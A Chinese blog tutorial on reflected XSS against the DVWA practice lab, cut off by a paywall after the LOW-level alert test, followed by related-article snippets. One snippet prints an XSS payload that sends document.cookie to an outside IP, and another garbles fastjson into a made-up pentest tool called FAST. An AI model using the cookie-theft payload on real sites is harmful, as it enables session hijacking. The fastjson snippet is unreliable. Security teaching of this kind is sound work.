Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)

最新推荐文章于 2025-05-14 14:12:44 发布
最新推荐文章于 2025-05-14 14:12:44 发布
阅读量4.5k 收藏 37
点赞数 5
分类专栏: Kali渗透测试 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43625577/article/details/89917893
版权

目录

一、XSS

      1、XSS简介

      2、XSS类型

      3、漏洞形成的根源

二、反射型XSS

      1、原理示意图​

      2、实验环境

      3、实验步骤

           安全级别:LOW

                   重定向

                   获取cookie

           安全级别:Medium

           安全级别:High

           安全级别:Impossible

一、XSS

1、XSS简介

        XSS,跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的。

2、XSS类型

  • 反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。
  • 存储型XSS:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie。
  • DOM型XSS:文本对象模式XSS,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。

3、漏洞形成的根源

  • 服务器对用户提交的数据过滤不严;
  • 提交给服务器端的脚本被直接返回给其他客户端执行;
  • 脚本在客户端执行恶意操作;

二、反射型XSS

1、原理示意图

获取cookie

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 黑客获取被攻击方的cookie

重定向

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 被攻击方点击url重定向到第三方网站

2、实验环境

1、测试机:物理机Windows 10,远程登录DVWA;安装BurpSuite

2、DVWA服务器:Windows Server 2003(192.168.247.129),启动phpStudy。

3、实验步骤

安全级别:LOW

查看源码

源码分析

       从源码中可以看到,直接引用来 name参数,并没有对输入的参数做任何过滤;例如:输入a,则返回含有 ' Hello a ' 的js页面。

1、直接嵌入html:<script>alert(‘xss’)</script>,弹出弹框xss。

使用Burpsuite抓包查看,返回的页面信息为含有输入信息的js页面; 

最低0.47元/天 解锁文章
dvwaxss反射型
Alonegrief的博客
12-01 971
Xss漏洞原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 反射型XSS跨站,不是长期可以加载恶意代码的,并不留存于网站代码中,这种攻击是需要诱导客户去点击特定的URL地址才能触发。 例子: Xss反射型: 打开dvwa,安全级别调为low 发现这有个输入框,尝试的输入点什么进去 发现会直接返回“Hello xxx” 测试xss可以直接在有输入框的位置插入代码 发现直接执行弹窗,1
Kali渗透测试DVWA系列5——存储型XSS(跨站脚本攻击)
浅浅的博客
05-11 3013
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储型XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3785
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA靶场保姆级通关教程--10XSS反射型
最新发布
m0_74020575的博客
05-14 903
放射型 XSS(Reflected XSS)是一种跨站脚本攻击(Cross-Site Scripting, XSS)类型,指攻击者将恶意脚本代码作为参数注入到用户的请求中,并通过服务器原样返回这些参数到网页中,导致脚本被立即执行。
DVWA反射型XSS
追风筝的孩子
08-15 641
       这反射型XSS的三个等级的代码进行分析,最高级的不讲。 一:LOW等级 1、服务器端核心代码 &lt;?php // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedback for end u...
N10 DVWA 反射型XSS
尐猴子君ii的博客
08-25 274
一、概念 XSS,全称Cross Site Scripting,跨站脚本攻击。在页面中注入恶意的脚本代码,当受害者访问该页面是,恶意代码会在其浏览器上执行。XSS不仅仅限于JavaScript,还包含Flash等其他脚本语言。根据恶意代码是否存储在服务器上,XSS可以分为存储性的XSS和反射性的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用的document.baby.innerHtml等函数动态生成的Html页面,如果这些函数在引用某些变量时没
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4483
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
DVWA系列(三)——使用Burpsuite进行反射型XSS反射型跨站脚本攻击
橘子女侠
05-05 3977
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; (3)JavaScript 与J...
DVWA系列XSS(跨站脚本攻击)——DOM型XSS源码分析及漏洞利用
7Riven's blog
11-27 1572
DOM型XSS Document Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方 在反射型XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWA系列(五)—— 使用Burpsuite进行反射型XSS反射型跨脚本攻击)
weixin_45116657的博客
08-25 1300
目录: 一、XSS说明: XSS简介 XSS类型 漏洞形成的根源 二、反射型XSS: 原理示意图 实验环境 实验步骤 安全级别:LOW - 重定向 - 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 一、XSS说明 1、XSS简介 XSS,即跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading S...
DVWAXSS(Reflected)反射型XSS
RexHa的博客
10-07 2442
dvwa 反射型XSS
DVWA通关--反射型XSSXSS (Reflected)
箭雨镜屋
12-16 2278
LOW 通关步骤 源码分析
渗透测试基础-反射型XSS原理及实操
热门推荐
weixin_45488495的博客
04-17 1万+
渗透测试基础-反射型XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
DVWA】--- 九、反射型XSS(XSS Reflected)
qq_43168364的博客
05-31 832
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html中已经有我们插入的代码了 但是当我们再点击以下改模块时面的代码就会消失,这就是反射型XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
DVWA--反射型XSS(Reflected)攻略详解
Silver_lion的博客
08-13 8888
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
DVWA------反射型XSS
Z_Grant的博客
08-25 1586
文章目录一,XSS中常用的JS代码和HTML元素(1)普通使用(2) 获得cookie和重定向(3)引入脚本文件二,DVWA的学习(1)低级1.1 重定向1.2 获取cookie1.3 kali监听获取目标的cookie(2)中级2.1 绕过方法2.1.1 大写 script2.1.2 复写2.1.3 使用其他没有被过滤的标签(3)高级(4)impossible4.1 绕过方法三,php常用的过滤...
结合DVWA反射型XSS浅析
qq_43660551的博客
01-08 2824
一.概念 XSS跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页中插入恶意脚本。 二.分类 1.反射型XSS:简单地把用户输入的数据反射给浏览器。 2.存储型XSS:将用户输入的数据存储在服务器端。 3.DOM型XSS:通过修改页面的DOM节点形成XSS。 三.DVWA-XSS实践 1.低级 看下源码,这无任何过滤。直接将用户的输入反射给浏览器。 故直接构造payload语句:<script>alert(/This is XSS!/)</s...
DVWA-Xss(reflected)反射型跨站脚本攻击
简简的博客
02-02 1802
系列文集:DVWA学习笔记 反射型Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
kali复现fastjson1.2.27
02-08
### 关于 FAST 1.2.27 版本的安全漏洞或功能复现 FAST 是一款用于自动化渗透测试工具链中的组件之一,在 Kali Linux 上可以利用该工具执行多种安全评估任务。为了在 Kali Linux 中复现 FAST 1.2.27 的特定功能或验证其已知漏洞,通常需要遵循一系列操作流程来设置环境并运行相应的命令。 #### 安装依赖项和配置环境 确保安装了必要的库文件和其他依赖关系,这可以通过更新包列表以及安装所需软件包完成: ```bash sudo apt update && sudo apt upgrade -y ``` #### 获取 FAST 工具 如果尚未安装 FAST,则可以从官方源获取最新版本或者指定要使用的旧版(如 1.2.27)。对于某些老旧版本可能无法直接通过 APT 获得,此时可考虑从 GitHub 或其他可信资源下载 tarball 文件并手动编译安装[^1]。 #### 配置与启动服务 按照文档说明正确配置 FAST 所需的服务端口、路径等参数,并确保这些设定不会与其他正在运行的应用冲突。接着就可以尝试启动 Fast 来查看是否有任何错误提示出现。 #### 测试目标应用/系统 针对想要检测的目标应用程序或操作系统实施具体的攻击向量模拟;比如 SQL 注入、XSS 攻击等常见 Web 应用程序缺陷。这假设 fast 1.2.27 存在一个关于 HTTP 请求处理不当的问题,那么可以编写简单的脚本来触发此行为: ```python import requests url = "http://target-ip/path" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"} data = {'param': 'value'} response = requests.post(url, headers=headers, data=data) print(response.status_code) print(response.text) ``` 上述代码仅为示例性质,实际环境中应当依据 fast 1.2.27 具体存在的漏洞特征调整请求方式及载荷内容[^2]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值